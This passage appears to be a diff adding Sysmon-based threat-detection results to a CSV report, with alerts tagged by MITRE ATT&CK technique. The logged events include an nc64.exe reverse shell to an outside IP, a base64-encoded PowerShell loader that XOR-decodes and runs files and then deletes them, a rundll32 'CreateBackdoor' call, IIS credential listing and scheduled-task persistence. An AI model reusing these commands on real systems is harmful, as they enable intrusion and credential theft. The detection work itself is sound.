AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 141993
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-11 23:21:56.654
+ 747F3D96-DE14-5EB9-0000-001079154300
+ 224
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe
+ c:\Users\IEUser\tools\PrivEsc\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-5461-5EBA-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DE14-5EB9-0000-00107C0F4300
+ 4468
+ C:\Users\IEUser\Tools\Misc\nc64.exe
+ c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243520
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.533
+ 747F3D96-9F61-5E75-0000-00103D6F1E00
+ 7124
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243520
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.533
+ 747F3D96-9F61-5E75-0000-00103D6F1E00
+ 7124
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556720
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:01.091
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ 11.00.17763.1 (WinBuild.160101.0800)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ MSHTA.EXE
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
+ 747F3D96-1239-610F-0000-0010D0210A00
+ 600
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243520
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.533
+ 747F3D96-9F61-5E75-0000-00103D6F1E00
+ 7124
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556720
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:01.091
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ 11.00.17763.1 (WinBuild.160101.0800)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ MSHTA.EXE
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
+ 747F3D96-1239-610F-0000-0010D0210A00
+ 600
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 556720
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-08-07 23:33:01.091
+ 747F3D96-182D-610F-0000-00106F40D300
+ 9932
+ C:\Windows\SysWOW64\mshta.exe
+ 11.00.17763.1 (WinBuild.160101.0800)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ MSHTA.EXE
+ "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-1231-610F-0000-002057A80700
+ 0x7a857
+ 1
+ Medium
+ SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989
+ 747F3D96-1239-610F-0000-0010D0210A00
+ 600
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5961
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.433
+ 365ABB72-3D6F-5CEB-0000-00100FC7FF00
+ 2168
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 112972
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-10 00:09:43.370
+ 747F3D96-4647-5EB7-0000-0010B3454B01
+ 7672
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ c:\Users\IEUser\Tools\PrivEsc\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-3B92-5EB5-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-4640-5EB7-0000-0010EF364B01
+ 372
+ C:\Windows\System32\cmd.exe
+ c:\Windows\System32\cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5958
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.353
+ 365ABB72-3D6F-5CEB-0000-00104FC3FF00
+ 2484
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5951
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-04 10:16:50.403
+ 747F3D96-B092-5D46-0000-001089041204
+ 7792
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-B091-5D46-0000-001081F71104
+ 820
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424076
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:57:36.394
+ 747F3D96-51D0-5F93-0000-0010B2B35B00
+ 5572
+ C:\Windows\SysWOW64\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers
+ C:\Users\IEUser\AppData\Local\Temp\tmp1375\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002085A50800
+ 0x8a585
+ 1
+ High
+ SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
+ 747F3D96-51D0-5F93-0000-001036A15B00
+ 3396
+ C:\Windows\SysWOW64\rundll32.exe
+ "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
